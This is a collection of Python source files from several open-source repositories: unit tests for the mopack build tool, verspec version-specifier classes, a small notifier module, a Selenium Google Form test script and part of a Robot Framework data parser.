Foo.fn._reset(f)
self.assertEqual(f.fn(0), 1)
self.assertEqual(f.fn(1), 3)
self.assertEqual(f.fn(0), 1)
g = Foo(1)
self.assertEqual(g.fn(0), 2)
self.assertEqual(g.fn(1), 4)
self.assertEqual(g.fn(0), 2)
Foo.fn._reset(f)
self.assertEqual(f.fn(0), 3)
self.assertEqual(f.fn(1), 5)
self.assertEqual(f.fn(0), 3)
self.assertEqual(g.fn(0), 2)
self.assertEqual(g.fn(1), 4)
self.assertEqual(g.fn(0), 2)
```
#### File: test/unit/test_package_defaults.py
```python
from unittest import mock, TestCase
from mopack.package_defaults import DefaultConfig, _get_default_config
from mopack.yaml_tools import YamlParseError
def mock_open(read_data):
return mock.mock_open(read_data=read_data)
class TestDefaultConfig(TestCase):
def test_string_field(self):
data = 'source:\n foo:\n field: value'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'value')
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', 'default'),
'default')
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', 'default'),
'default')
self.assertEqual(cfg.get({}, 'usage', 'foo', 'field'), None)
self.assertEqual(cfg.get({}, 'usage', 'foo', 'field', 'default'),
'default')
def test_list_field(self):
data = 'source:\n foo:\n field: [1, 2]'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), [1, 2])
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', []), [])
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', []), [])
def test_dict_field(self):
data = 'source:\n foo:\n field: {goat: 1, panda: 2}'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'),
{'goat': 1, 'panda': 2})
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', {}), {})
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', {}), {})
def test_expr_field(self):
data = 'source:\n foo:\n field: $variable'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
symbols = {'variable': 'goat'}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
symbols = {'variable': 'panda'}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
def test_conditional(self):
data = 'source:\n foo:\n - if: true\n field: goat'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
data = 'source:\n foo:\n - if: false\n field: goat'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
def test_conditional_expr(self):
data = ('source:\n foo:\n - if: variable == true\n' +
' field: goat\n - field: panda')
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
symbols = {'variable': True}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
symbols = {'variable': False}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
def test_invalid_conditional(self):
data = ('source:\n foo:\n - field: goat\n - field: panda')
with mock.patch('builtins.open', mock_open(data)), \
self.assertRaises(YamlParseError): # noqa
DefaultConfig('file.yml')
def test_invalid_genus(self):
data = ('goofy:\n foo:\n field: value')
with mock.patch('builtins.open', mock_open(data)), \
self.assertRaises(YamlParseError): # noqa
DefaultConfig('file.yml')
data = ('source:\n foo:\n field: value')
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
with self.assertRaises(ValueError):
cfg.get({}, 'goofy', 'foo', 'field')
class TestGetDefaultConfig(TestCase):
def setUp(self):
_get_default_config._reset()
def tearDown(self):
_get_default_config._reset()
def test_normal(self):
with mock.patch('os.path.exists', return_value=False) as mexists:
_get_default_config('foo')
mexists.assert_called_once()
def test_invalid_characters(self):
with mock.patch('os.path.exists', return_value=False) as mexists:
_get_default_config('foo/bar')
_get_default_config('.')
_get_default_config('../foo')
mexists.assert_not_called()
```
#### File: test/unit/test_pkg_config.py
```python
from io import StringIO
from unittest import TestCase
from mopack.path import Path
from mopack.pkg_config import write_pkg_config
from mopack.shell import ShellArguments
class TestWritePkgConfig(TestCase):
def test_default(self):
out = StringIO()
write_pkg_config(out, 'mypackage')
self.assertRegex(
out.getvalue(),
'Name: mypackage\n' +
'Description: mopack-generated package\n' +
'Version: \n$'
)
def test_arguments(self):
out = StringIO()
write_pkg_config(out, 'mypackage', desc='my package', version='1.0',
cflags=ShellArguments(['-Ifoo']),
libs=ShellArguments(['-lbar']))
self.assertRegex(
out.getvalue(),
'Name: mypackage\n' +
'Description: my package\n' +
'Version: 1.0\n' +
'Cflags: -Ifoo\n' +
'Libs: -lbar\n$'
)
def test_variables(self):
out = StringIO()
write_pkg_config(
out, 'mypackage', desc='my package', version='1.0',
cflags=ShellArguments([('-I', Path('foo', 'srcdir'))]),
libs=ShellArguments([('-L', Path('', 'builddir')), '-lbar']),
variables={'srcdir': '/srcdir', 'builddir': '/builddir'}
)
self.assertRegex(
out.getvalue(),
'srcdir=/srcdir\n' +
'builddir=/builddir\n\n' +
'Name: mypackage\n' +
'Description: my package\n' +
'Version: 1.0\n' +
'Cflags: -I[\'"]\\${srcdir}[/\\\\]foo[\'"]\n' +
'Libs: -L[\'"]\\${builddir}[\'"] -lbar\n$'
)
def test_invalid(self):
out = StringIO()
with self.assertRaises(TypeError):
write_pkg_config(out, 'mypackage', variables={'srcdir': 1})
with self.assertRaises(TypeError):
write_pkg_config(out, 'mypackage', cflags=1)
``` |
{
"source": "jimporter/verspec",
"score": 3
} |
#### File: verspec/verspec/basespecifier.py
```python
import abc
from typing import (Callable, Dict, Iterable, Iterator, Optional, Pattern, Set,
Tuple, Union)
from .baseversion import BaseVersion, UnparsedVersion
CallableOperator = Callable[[BaseVersion, str], bool]
class InvalidSpecifier(ValueError):
"""
An invalid specifier was found, users should refer to PEP 440.
"""
class BaseSpecifier(metaclass=abc.ABCMeta):
@abc.abstractmethod
def __str__(self) -> str:
"""
Returns the str representation of this Specifier like object. This
should be representative of the Specifier itself.
"""
@abc.abstractmethod
def __hash__(self) -> int:
"""
Returns a hash value for this Specifier like object.
"""
@abc.abstractmethod
def __eq__(self, other: object) -> bool:
"""
Returns a boolean representing whether or not the two Specifier like
objects are equal.
"""
@abc.abstractmethod
def __ne__(self, other: object) -> bool:
"""
Returns a boolean representing whether or not the two Specifier like
objects are not equal.
"""
@abc.abstractproperty
def prereleases(self) -> Optional[bool]:
"""
Returns whether or not pre-releases as a whole are allowed by this
specifier.
"""
@prereleases.setter
def prereleases(self, value: bool) -> None:
"""
Sets whether or not pre-releases as a whole are allowed by this
specifier.
"""
@abc.abstractmethod
def contains(self, item: UnparsedVersion,
prereleases: Optional[bool] = None) -> bool:
"""
Determines if the given item is contained within this specifier.
"""
@abc.abstractmethod
def filter(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool] = None,
) -> Iterable[UnparsedVersion]:
"""
Takes an iterable of items and filters them so that only items which
are contained within this specifier are allowed in it.
"""
class IndividualSpecifier(BaseSpecifier, metaclass=abc.ABCMeta):
_operators: Dict[str, str] = {}
_regex = None # type: Pattern
def __init__(self, spec: str = "",
prereleases: Optional[bool] = None) -> None:
match = self._regex.search(spec)
if not match:
raise InvalidSpecifier("Invalid specifier: '{0}'".format(spec))
self._spec: Tuple[str, str] = (
match.group("operator").strip(),
match.group("version").strip(),
)
# Store whether or not this Specifier should accept prereleases
self._prereleases = prereleases
@abc.abstractmethod
def _coerce_version(self, version: UnparsedVersion) -> BaseVersion:
pass
@property
@abc.abstractmethod
def _canonical_spec(self) -> Tuple[str, UnparsedVersion]:
pass
def __repr__(self) -> str:
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<{0}({1!r}{2})>".format(type(self).__name__, str(self), pre)
def __str__(self) -> str:
return "{0}{1}".format(*self._spec)
def __hash__(self) -> int:
return hash(self._canonical_spec)
def __eq__(self, other: object) -> bool:
if isinstance(other, str):
try:
other = type(self)(str(other))
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, type(self)):
return NotImplemented
return self._canonical_spec == other._canonical_spec
def __ne__(self, other: object) -> bool:
if isinstance(other, str):
try:
other = type(self)(str(other))
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, type(self)):
return NotImplemented
return self._canonical_spec != other._canonical_spec
def _get_operator(self, op: str) -> CallableOperator:
operator_callable: CallableOperator = getattr(
self, "_compare_{0}".format(self._operators[op])
)
return operator_callable
@property
def operator(self) -> str:
return self._spec[0]
@property
def version(self) -> str:
return self._spec[1]
@property
def prereleases(self) -> Optional[bool]:
return self._prereleases
@prereleases.setter
def prereleases(self, value: bool) -> None:
self._prereleases = value
def __contains__(self, item: UnparsedVersion) -> bool:
return self.contains(item)
def contains(self, item: UnparsedVersion,
prereleases: Optional[bool] = None) -> bool:
# Determine if prereleases are to be allowed or not.
if prereleases is None:
prereleases = self.prereleases
# Normalize item to a Version or LooseVersion; this allows us to have
# a shortcut for ``"2.0" in Specifier(">=2")``.
normalized_item = self._coerce_version(item)
# Determine if we should be supporting prereleases in this specifier
# or not; if we do not support prereleases, then we can short-circuit
# the logic if this version is a prerelease.
if normalized_item.is_prerelease and not prereleases:
return False
# Actually do the comparison to determine if this item is contained
# within this Specifier or not.
operator_callable = self._get_operator(self.operator)
return operator_callable(normalized_item, self.version)
def filter(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool] = None,
) -> Iterable[UnparsedVersion]:
yielded = False
found_prereleases = []
kw = {"prereleases": prereleases if prereleases is not None else True}
# Attempt to iterate over all the values in the iterable and if any of
# them match, yield them.
for version in iterable:
parsed_version = self._coerce_version(version)
if self.contains(parsed_version, **kw):
# If our version is a prerelease, and we were not set to allow
# prereleases, then we'll store it for later in case nothing
# else matches this specifier.
if parsed_version.is_prerelease and not (
prereleases or self.prereleases
):
found_prereleases.append(version)
# Either this is not a prerelease, or we should have been
# accepting prereleases from the beginning.
else:
yielded = True
yield version
# Now that we've iterated over everything, determine if we've yielded
# any values, and if we have not and we have any prereleases stored up
# then we will go ahead and yield the prereleases.
if not yielded and found_prereleases:
for version in found_prereleases:
yield version
class BaseSpecifierSet(BaseSpecifier, metaclass=abc.ABCMeta):
def __init__(self, parsed_specifiers: Set[BaseSpecifier],
prereleases: Optional[bool]) -> None:
# Turn our parsed specifiers into a frozen set and save them for later.
self._specs = frozenset(parsed_specifiers)
# Store our prereleases value so we can use it later to determine if
# we accept prereleases or not.
self._prereleases = prereleases
@abc.abstractmethod
def _coerce_version(self, version: UnparsedVersion) -> BaseVersion:
pass
@abc.abstractmethod
def _filter_prereleases(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool]
) -> Iterable[UnparsedVersion]:
pass
def __repr__(self) -> str:
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<{0}({1!r}{2})>".format(type(self).__name__, str(self), pre)
def __str__(self) -> str:
return ",".join(sorted(str(s) for s in self._specs))
def __hash__(self) -> int:
return hash(self._specs)
def __and__(
self, other: Union["BaseSpecifierSet", str],
) -> "BaseSpecifierSet":
if isinstance(other, str):
other = type(self)(other) # type: ignore
elif not isinstance(other, type(self)):
# Currently, SpecifierSets and LooseSpecifierSets can't be
# combined.
return NotImplemented
specifier = type(self)() # type: ignore
specifier._specs = frozenset(self._specs | other._specs)
if self._prereleases is None and other._prereleases is not None:
specifier._prereleases = other._prereleases
elif self._prereleases is not None and other._prereleases is None:
specifier._prereleases = self._prereleases
elif self._prereleases == other._prereleases:
specifier._prereleases = self._prereleases
else:
raise ValueError(
"Cannot combine {}s with True and False prerelease "
"overrides.".format(type(self).__name__)
)
return specifier
def __eq__(self, other: object) -> bool:
if isinstance(other, (str, IndividualSpecifier)):
other = type(self)(str(other)) # type: ignore
elif not isinstance(other, BaseSpecifierSet):
return NotImplemented
return self._specs == other._specs
def __ne__(self, other: object) -> bool:
if isinstance(other, (str, IndividualSpecifier)):
other = type(self)(str(other)) # type: ignore
elif not isinstance(other, BaseSpecifierSet):
return NotImplemented
return self._specs != other._specs
def __len__(self) -> int:
return len(self._specs)
def __iter__(self) -> Iterator[BaseSpecifier]:
return iter(self._specs)
@property
def prereleases(self) -> Optional[bool]:
# If we have been given an explicit prerelease modifier, then we'll
# pass that through here.
if self._prereleases is not None:
return self._prereleases
# If we don't have any specifiers, and we don't have a forced value,
# then we'll just return None since we don't know if this should have
# pre-releases or not.
if not self._specs:
return None
# Otherwise we'll see if any of the given specifiers accept
# prereleases, if any of them do we'll return True, otherwise False.
return any(s.prereleases for s in self._specs)
@prereleases.setter
def prereleases(self, value: bool) -> None:
self._prereleases = value
def __contains__(self, item: UnparsedVersion) -> bool:
return self.contains(item)
def contains(self, item: UnparsedVersion,
prereleases: Optional[bool] = None) -> bool:
# Ensure that our item is a PythonVersion or LooseVersion instance.
parsed_item = self._coerce_version(item)
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# We can determine if we're going to allow pre-releases by looking to
# see if any of the underlying items supports them. If none of them do
# and this item is a pre-release then we do not allow it and we can
# short circuit that here.
# Note: This means that 1.0.dev1 would not be contained in something
# like >=1.0.devabc, however it would be in >=1.0.devabc,>0.0.dev0
if not prereleases and parsed_item.is_prerelease:
return False
# We simply dispatch to the underlying specs here to make sure that the
# given version is contained within all of them.
# Note: This use of all() here means that an empty set of specifiers
# will always return True, this is an explicit design decision.
return all(
s.contains(parsed_item, prereleases=prereleases)
for s in self._specs
)
def filter(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool] = None,
) -> Iterable[UnparsedVersion]:
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# If we have any specifiers, then we want to wrap our iterable in the
# filter method for each one, this will act as a logical AND amongst
# each specifier.
if self._specs:
for spec in self._specs:
iterable = spec.filter(iterable, prereleases=bool(prereleases))
return iterable
# If we do not have any specifiers, then we need to have a rough filter
# which will filter out any pre-releases, unless there are no final
# releases, and which will filter out LooseVersion in general.
else:
return self._filter_prereleases(iterable, prereleases)
```
#### File: verspec/verspec/loose.py
```python
import re
from typing import Iterator, List, Tuple
from .baseversion import *
from .basespecifier import *
__all__ = ["InvalidVersion", "InvalidSpecifier", "LooseSpecifier",
"LooseSpecifierSet", "LooseVersion"]
LooseCmpKey = Tuple[str, ...]
class LooseVersion(BaseVersion):
def __init__(self, version: str) -> None:
self._version = str(version)
self._key = _loose_cmpkey(self._version)
def __str__(self) -> str:
return self._version
@property
def public(self) -> str:
return self._version
@property
def base_version(self) -> str:
return self._version
@property
def epoch(self) -> int:
return 0
@property
def release(self) -> None:
return None
@property
def pre(self) -> None:
return None
@property
def post(self) -> None:
return None
@property
def dev(self) -> None:
return None
@property
def local(self) -> None:
return None
@property
def is_prerelease(self) -> bool:
return False
@property
def is_postrelease(self) -> bool:
return False
@property
def is_devrelease(self) -> bool:
return False
_loose_version_component_re = re.compile(r"(\d+ | [a-z]+ | \.| -)", re.VERBOSE)
_loose_version_replacement_map = {
"pre": "c",
"preview": "c",
"-": "final-",
"rc": "c",
"dev": "@",
}
def _parse_version_parts(s: str) -> Iterator[str]:
for part in _loose_version_component_re.split(s):
part = _loose_version_replacement_map.get(part, part)
if not part or part == ".":
continue
if part[:1] in "0123456789":
# pad for numeric comparison
yield part.zfill(8)
else:
yield "*" + part
# ensure that alpha/beta/candidate are before final
yield "*final"
def _loose_cmpkey(version: str) -> LooseCmpKey:
# This scheme is taken from pkg_resources.parse_version in setuptools prior
# to its adoption of the packaging library.
parts: List[str] = []
for part in _parse_version_parts(version.lower()):
if part.startswith("*"):
# remove "-" before a prerelease tag
if part < "*final":
while parts and parts[-1] == "*final-":
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == "00000000":
parts.pop()
parts.append(part)
return tuple(parts)
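# Illustrative examples (not part of the original module) of the comparison
# keys produced above:
#   _loose_cmpkey("1.0")   -> ('00000001', '*final')
#   _loose_cmpkey("1.0a1") -> ('00000001', '*a', '00000001', '*final')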
class LooseSpecifier(IndividualSpecifier):
_regex_str = r"""
(?P<operator>(==|!=|<=|>=|<|>))
\s*
(?P<version>
[^,;\s)]* # Since this is a "loose" specifier, and the version
# string can be just about anything, we match everything
# except for whitespace, a semi-colon for marker support,
# a closing paren since versions can be enclosed in
# them, and a comma since it's a version separator.
)
"""
_regex = re.compile(r"^\s*" + _regex_str + r"\s*$",
re.VERBOSE | re.IGNORECASE)
_operators = {
"==": "equal",
"!=": "not_equal",
"<=": "less_than_equal",
">=": "greater_than_equal",
"<": "less_than",
">": "greater_than",
}
def _coerce_version(self, version: UnparsedVersion) -> LooseVersion:
if not isinstance(version, LooseVersion):
version = LooseVersion(str(version))
return version
@property
def _canonical_spec(self) -> Tuple[str, str]:
return self._spec
def _compare_equal(self, prospective: LooseVersion, spec: str) -> bool:
return prospective == self._coerce_version(spec)
def _compare_not_equal(self, prospective: LooseVersion, spec: str) -> bool:
return prospective != self._coerce_version(spec)
def _compare_less_than_equal(self, prospective: LooseVersion,
spec: str) -> bool:
return prospective <= self._coerce_version(spec)
def _compare_greater_than_equal(self, prospective: LooseVersion,
spec: str) -> bool:
return prospective >= self._coerce_version(spec)
def _compare_less_than(self, prospective: LooseVersion, spec: str) -> bool:
return prospective < self._coerce_version(spec)
def _compare_greater_than(self, prospective: LooseVersion,
spec: str) -> bool:
return prospective > self._coerce_version(spec)
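# For illustration (not part of the original module), a LooseSpecifier can be
# used on its own:
#   LooseSpecifier(">=1.0").contains("1.1")  # True
#   "0.9" in LooseSpecifier(">=1.0")         # False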
class LooseSpecifierSet(BaseSpecifierSet):
def __init__(self, specifiers: str = "") -> None:
# Split on , to break each individual specifier into its own item, and
# strip each item to remove leading/trailing whitespace.
split_specifiers = [s.strip() for s in specifiers.split(",")
if s.strip()]
# Parse each individual specifier as a LooseSpecifier.
parsed: Set[BaseSpecifier] = set(LooseSpecifier(specifier)
for specifier in split_specifiers)
super().__init__(parsed, None)
def _coerce_version(self, version: UnparsedVersion) -> LooseVersion:
if not isinstance(version, LooseVersion):
version = LooseVersion(str(version))
return version
def _filter_prereleases(
self, iterable: Iterable[UnparsedVersion],
prereleases: Optional[bool]
) -> Iterable[UnparsedVersion]:
# Note: We ignore prereleases, since LooseVersions are never
# prereleases, and only have that field for compatibility.
return iterable
Version = LooseVersion
Specifier = LooseSpecifier
SpecifierSet = LooseSpecifierSet
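# Minimal usage sketch (illustrative only):
#   LooseVersion("1.0") in LooseSpecifierSet(">=1.0,<2.0")  # True
#   list(LooseSpecifierSet("<2.0").filter(["1.5", "2.1"]))  # ['1.5']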
``` |
{
"source": "jimporter/watcher",
"score": 3
} |
#### File: watcher/watcher/notifiers.py
```python
import smtplib
from email.mime.text import MIMEText
class Notifiers:
def __init__(self):
self._default = None
self._notifiers = {}
def add(self, name, kind, default=False, **kwargs):
notifier = _known_notifiers[kind](**kwargs)
self._notifiers[name] = notifier
if default:
if self._default:
raise TypeError('default already set')
self._default = notifier
@property
def default(self):
if self._default is None:
raise TypeError('no default set')
return self._default
def __getitem__(self, key):
return self._notifiers[key]
class ConsoleNotifier:
def notify(self, eq):
print('New stuff: {}'.format(eq.added))
class EmailNotifier:
def __init__(self, server, username, password, to_addr, from_addr=None):
server, port = server.split(':')
self.server = server
self.port = int(port)
self.username = username
self.password = password
self.from_addr = from_addr or username
self.to_addr = to_addr
def notify(self, eq):
server = smtplib.SMTP(self.server, self.port)
server.starttls()
server.login(self.username, self.password)
msg = MIMEText('New stuff: {}'.format(eq.added))
msg['From'] = self.from_addr
msg['To'] = self.to_addr
server.send_message(msg)
server.quit()
_known_notifiers = {
'console': ConsoleNotifier,
'email': EmailNotifier,
}
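# Minimal usage sketch (illustrative only; `eq` is assumed to be an object
# exposing an `added` attribute, as notify() expects):
#   notifiers = Notifiers()
#   notifiers.add('stdout', 'console', default=True)
#   notifiers.default.notify(eq)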
``` |
{
"source": "jimpriest/presentations",
"score": 3
} |
#### File: tacfug-webdriver-2015/google/google-form4.py
```python
import unittest, os, random, datetime
from selenium import webdriver
from datetime import datetime
from vars import ( phantomjs_path, url )
from selenium.webdriver.support.ui import Select
color_list = ['Blue', 'Red', 'Green', 'Yellow']
random_color = random.choice(color_list)
name_list = ['<NAME>', '<NAME>', '<NAME>', '<NAME>']
random_name = random.choice(name_list)
current_year = datetime.now().strftime('%Y')
random_year = random.choice(range(1892, int(current_year)))
email_list = ['<EMAIL>', '<EMAIL>', '<EMAIL>', '<EMAIL>']
random_email = random.choice(email_list)
class GoogleForm(unittest.TestCase):
def setUp(self):
print "let's leverage Python and add some randomness!\ncheck out random.png"
print random_email
self.driver = webdriver.PhantomJS(executable_path=phantomjs_path, service_log_path=os.path.devnull)
self.driver.set_window_size(1024, 768)
self.driver.get(url)
def test_google_form(self):
driver = self.driver
driver.find_element_by_id("entry_510407236").send_keys("{0}".format(random_name))
Select(driver.find_element_by_id("entry.462822380_month")).select_by_visible_text("January")
Select(driver.find_element_by_id("entry.462822380_day")).select_by_visible_text("1")
Select(driver.find_element_by_id("entry.462822380_year")).select_by_visible_text("{}".format(random_year))
Select(driver.find_element_by_id("entry_768625966")).select_by_visible_text("{0}".format(random_color))
driver.find_element_by_id("entry_888074637").send_keys("{0}".format(random_email))
self.driver.save_screenshot('random.png')
driver.find_element_by_id("ss-submit").click()
def tearDown(self):
# let's add some validation / error checking
try:
self.assertTrue(("Your response has been recorded" in self.driver.find_element_by_tag_name("html").text), "Could not find verification message.")
print "Test passed!"
except AssertionError as e:
print("Test failed: Could not find verification text.")
self.driver.quit()
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jimpriest/sublime-robot-framework-assistant",
"score": 3
} |
#### File: command_helper/utils/util.py
```python
import re
from json import load as json_load
def get_data_from_json(json_file):
with open(json_file) as f:
data = json_load(f)
return data
def _keyword_with_embedded_arg(kw, kw_candite):
kw = kw.lower().replace(' ', '').replace('_', '')
kw_candite = kw_candite.lower().replace(' ', '').replace('_', '')
kw_re = re.sub(r'(?i)(\$\{[\w ]*\})', r'(?i)(\S+)', kw_candite)
return re.search(kw_re, kw)
def _keyword_no_embedded_arg(kw, kw_candite):
kw = kw.lower().replace(' ', '').replace('_', '')
kw_candite = kw_candite.lower().replace(' ', '').replace('_', '')
kw_candite = kw_candite.lstrip('.')
return kw == kw_candite
def kw_equals_kw_candite(kw, kw_candite):
"""Returns True if kw == kw_canditate
Spaces, under score are removed and
strings are converted to lower before validation.
Also support keyword conditate with emedded args
"""
if '$' in kw_candite:
return _keyword_with_embedded_arg(kw, kw_candite)
else:
return _keyword_no_embedded_arg(kw, kw_candite)
```
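A quick sketch of how the matcher above behaves (the import path is assumed from the file header); spaces, underscores and case are ignored for plain keyword candidates:
```python
from command_helper.utils.util import kw_equals_kw_candite  # path assumed from the file header
# Plain keyword candidates: normalised string equality.
assert kw_equals_kw_candite('Common Keyword 2', 'common_keyword_2')
assert not kw_equals_kw_candite('Common Keyword 2', 'Other Keyword')
```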
#### File: dataparser/data_parser/data_parser.py
```python
from robot import parsing
from robot.variables.filesetter import VariableFileSetter
from robot.variables.store import VariableStore
from robot.variables.variables import Variables
from robot.libdocpkg.robotbuilder import LibraryDocBuilder
from robot.utils.importer import Importer
from robot.libraries import STDLIBS
from robot.output import LOGGER as ROBOT_LOGGER
from robot.errors import DataError
from os import path
import xml.etree.ElementTree as ET
from tempfile import mkdtemp
import logging
import inspect
from parser_utils.util import normalise_path
from db_json_settings import DBJsonSetting
logging.basicConfig(
format='%(levelname)s:%(asctime)s: %(message)s',
level=logging.DEBUG)
def strip_and_lower(text):
return text.lower().replace(' ', '_')
class DataParser():
""" This class is used to parse different tables in test data.
The class returns the test data in JSON format. It can parse
Python libraries, library XML documentation generated by libdoc,
and resource and test suite files.
"""
def __init__(self):
self.file_path = None
self.rf_variables = Variables()
self.rf_var_storage = VariableStore(self.rf_variables)
self.libdoc = LibraryDocBuilder()
def parse_resource(self, file_path):
self.file_path = file_path
if path.exists(file_path):
if '__init__.' in file_path:
folder = path.dirname(file_path)
model = parsing.TestDataDirectory(source=folder).populate()
else:
model = parsing.ResourceFile(file_path).populate()
return self._parse_robot_data(file_path, model)
else:
logging.error('File %s could not be found', file_path)
raise ValueError(
'File does not exist: {0}'.format(file_path))
def parse_suite(self, file_path):
self.file_path = file_path
if path.exists(file_path):
model = parsing.TestCaseFile(source=file_path).populate()
return self._parse_robot_data(file_path, model)
else:
logging.error('File %s could not be found', file_path)
raise ValueError(
'File does not exist: {0}'.format(file_path))
def parse_variable_file(self, file_path, args=None):
if not args:
args = []
data = {}
data[DBJsonSetting.file_name] = path.basename(file_path)
data[DBJsonSetting.file_path] = normalise_path(file_path)
self.file_path = file_path
setter = VariableFileSetter(self.rf_var_storage)
var_list = []
try:
variables = setter.set(file_path, args)
except DataError:
variables = []
for variable in variables:
var_list.append(variable[0])
data[DBJsonSetting.variables] = sorted(var_list)
return data
def parse_library(self, library, args=None):
"""Parses RF library to dictionary
Uses internally libdoc modules to parse the library.
Possible arguments to the library are provided in the
args parameter.
"""
data = {}
if not args:
data[DBJsonSetting.arguments] = []
else:
arg_list = []
for arg in args:
arg_list.append(arg)
data[DBJsonSetting.arguments] = arg_list
if path.isfile(library):
data[DBJsonSetting.file_path] = normalise_path(library)
if library.endswith('.xml'):
library_module, keywords = self._parse_xml_doc(library)
data[DBJsonSetting.keywords] = keywords
data[DBJsonSetting.library_module] = library_module
elif library.endswith('.py'):
data[DBJsonSetting.file_name] = path.basename(library)
data[DBJsonSetting.library_module] = path.splitext(
data[DBJsonSetting.file_name])[0]
data[DBJsonSetting.keywords] = self._parse_python_lib(
library, data[DBJsonSetting.arguments])
else:
raise ValueError('Unknown library')
else:
data[DBJsonSetting.library_module] = library
data[DBJsonSetting.keywords] = self._parse_python_lib(
library, data[DBJsonSetting.arguments])
if data[DBJsonSetting.keywords] is None:
raise ValueError('Library did not contain keywords')
else:
return data
def register_console_logger(self):
ROBOT_LOGGER.register_console_logger()
def unregister_console_logger(self):
ROBOT_LOGGER.unregister_console_logger()
def close_logger(self):
ROBOT_LOGGER.close()
def _parse_python_lib(self, library, args):
lib_with_args = self._lib_arg_formatter(library, args)
kws = {}
try:
lib = self.libdoc.build(lib_with_args)
except DataError:
raise ValueError(
'Library does not exist: {0}'.format(library))
if library in STDLIBS:
import_name = 'robot.libraries.' + library
else:
import_name = library
importer = Importer('test library')
libcode = importer.import_class_or_module(
import_name, return_source=False)
kw_with_deco = self._get_keywords_with_robot_name(libcode)
for keyword in lib.keywords:
kw = {}
kw[DBJsonSetting.keyword_name] = keyword.name
kw[DBJsonSetting.tags] = list(keyword.tags._tags)
kw[DBJsonSetting.keyword_arguments] = keyword.args
kw[DBJsonSetting.documentation] = keyword.doc
if keyword.name in kw_with_deco:
function_name = kw_with_deco[keyword.name]
else:
function_name = keyword.name
kw[DBJsonSetting.keyword_file] = self._get_library_kw_source(
libcode, function_name)
kws[strip_and_lower(keyword.name)] = kw
return kws
def _get_keywords_with_robot_name(self, libcode):
"""Returns keywords which uses Robot keyword decorator with robot_name
The keyword name can be chaned with Robot Framework keyword decorator
and by using the robot_name attribute. Return dictinionary which key is
the value of the robot_name attribute and the orinal function name.
"""
kw_deco = {}
for key in libcode.__dict__:
if callable(libcode.__dict__[key]):
try:
if 'robot_name' in libcode.__dict__[key].__dict__:
kw = libcode.__dict__[key].__dict__['robot_name']
kw_deco[kw] = key
except AttributeError:
pass
return kw_deco
def _get_library_kw_source(self, libcode, keyword):
kw_func = keyword.lower().replace(' ', '_')
func = None
func_file = None
if hasattr(libcode, kw_func):
func = getattr(libcode, kw_func)
if func:
kw_class = self.get_class_that_defined_method(func)
if kw_class:
func_file = self.get_function_file(kw_class)
else:
func_file = self.get_function_file(func)
return func_file
def get_class_that_defined_method(self, meth):
try:
class_mro = inspect.getmro(meth.im_class)
except AttributeError:
return None
for cls in class_mro:
if meth.__name__ in cls.__dict__:
return cls
return None
def get_function_file(self, kw_class):
file_ = inspect.getsourcefile(kw_class)
if file_ and path.exists(file_):
return normalise_path(file_)
else:
return None
def _lib_arg_formatter(self, library, args):
args = self._argument_path_formatter(library, args)
if not args:
return library
else:
for item in args:
library = '{lib}::{item}'.format(lib=library, item=item)
return library
def _argument_path_formatter(self, library, args):
"""Replace robot folder with real path
If ${/}, ${OUTPUT_DIR} or ${EXECDIR} is found from args then
a temporary directory is created and that one is used instead."""
arguments = []
for arg in args:
